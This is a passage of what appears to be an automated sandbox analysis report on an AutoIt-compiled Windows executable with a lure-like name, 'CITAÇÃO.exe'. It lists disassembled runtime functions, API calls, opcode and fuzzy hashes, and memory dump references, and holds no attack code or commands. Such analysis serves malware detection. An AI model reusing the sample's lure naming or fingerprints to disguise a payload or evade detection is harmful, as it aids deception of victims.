                                                      • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe
                                                      • API String ID: 3938964917-3764721689
                                                      • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                      • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                      • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                      • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                      Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: Error:
                                                      • API String ID: 4104443479-232661952
                                                      • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                      • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                      • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                      • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                      Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,0040F545,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,004A90E8,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,?,0040F545), ref: 0041013C
                                                        • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                        • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                        • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                        • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                      • String ID: X$pWH
                                                      • API String ID: 85490731-941433119
                                                      • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                      • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                      • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                      • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                      Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • _memmove.LIBCMT ref: 00401B57
                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                      • String ID: @EXITCODE
                                                      • API String ID: 2734553683-3436989551
                                                      • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                      • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                      • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                      • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                      Function 00410100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                      • C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe, xrefs: 00410107
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _strcat
                                                      • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe
                                                      • API String ID: 1765576173-1475317767
                                                      • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                      • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                      • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                      • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                      Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                      • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                      • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                      • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                      Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                      • String ID:
                                                      • API String ID: 1794320848-0
                                                      • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                      • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                      • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                      • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                      Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                      • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentTerminate
                                                      • String ID:
                                                      • API String ID: 2429186680-0
                                                      • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                      • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                      • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                      • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                      Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_
                                                      • String ID:
                                                      • API String ID: 1144537725-0
                                                      • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                      • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                      • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                      • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                      Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _malloc.LIBCMT ref: 0043214B
                                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                      • _malloc.LIBCMT ref: 0043215D
                                                      • _malloc.LIBCMT ref: 0043216F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _malloc$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 680241177-0
                                                      • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                      • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                      • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                      • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                      Function 00409519 Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • TranslateMessage.USER32(?), ref: 00409556
                                                      • DispatchMessageW.USER32(?), ref: 00409561
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Message$DispatchPeekTranslate
                                                      • String ID:
                                                      • API String ID: 4217535847-0
                                                      • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                      • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                      • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                      • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                      Function 0040AFA0 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                      • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                      • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                      • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                      Function 00467AC4 Relevance: 3.1, APIs: 2, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: 275534035a012e7ef0db215d78f24564d6aa5c775b6c55b3817692144b07e5e7
                                                      • Instruction ID: 2565b1472f88146c75409e19c065a4aacb94a5f6c219594ae44f545f2623c2f3
                                                      • Opcode Fuzzy Hash: 275534035a012e7ef0db215d78f24564d6aa5c775b6c55b3817692144b07e5e7
                                                      • Instruction Fuzzy Hash: 85412871D00104AFDB10AF15C881BAE7B74AF4670CF14C05AFA055B342E63DA946CBAA
                                                      Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                      • _strcat.LIBCMT ref: 0040F786
                                                        • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                        • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                      • String ID:
                                                      • API String ID: 3199840319-0
                                                      • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                      • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                      • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                      • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                      Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                      • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: FreeInfoLibraryParametersSystem
                                                      • String ID:
                                                      • API String ID: 3403648963-0
                                                      • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                      • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                      • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                      • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                      Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                      • __lock_file.LIBCMT ref: 00414A8D
                                                        • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                      • __fclose_nolock.LIBCMT ref: 00414A98
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
